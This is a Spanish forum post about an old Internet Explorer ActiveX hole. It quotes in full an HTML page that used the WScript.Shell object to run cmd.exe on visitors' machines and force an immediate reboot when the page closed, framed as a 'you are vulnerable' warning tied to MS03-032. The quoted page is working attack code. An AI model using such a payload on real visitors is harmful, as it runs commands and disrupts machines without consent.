Efectivamente, la página la quitaron del aire. De cualquier manera, ahí está la página que ellos tenían ahí. Yo por lo pronto deshabilité TODOS los controles de ActiveX luego de instalar el parche de MS, esperando a que salga otro que definitivamente corrija los problemas.
--- SNIP <request.html> SNIP ---
<html>
<head>
<script>
function reboot() {
wsh.Run("cmD.exe /k shutDown.exe -f -r -t 00");
wsh.Run("RUNDLL32 SHELL32.DLL,SHExitWindowsEx 42");
}
</script>
</head>
<body onUnload=reboot()>
<font size="1" face="verdana" color="red">You are vulnerable!!</font><br>
<font size="1" face="verdana">A month before the blaster worm slammed the internet, Microsoft released a patch for the RPC hole. It is only because people did not take the hole seriously, that blaster caused as much damage as it did. Because of this, If you decide to close this window and disregard the fact that you are vulnerable, I will restart your computer. Please just apply the patch and let it restart so it can protect not only you, but the rest of the internet.</font>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("cmD.exe /k echo You are vulnerable, in this dos prompt, I could have easily ran any command I wanted, but chose to only run an echo command for test purposes.");
</script>
<iframe width="100%" height="100%" src="http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-032.asp">IFrames Not Supported, go to
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-032.asp and update DO NOT CLOSE THIS WINDOW</iframe>
<body>
</html>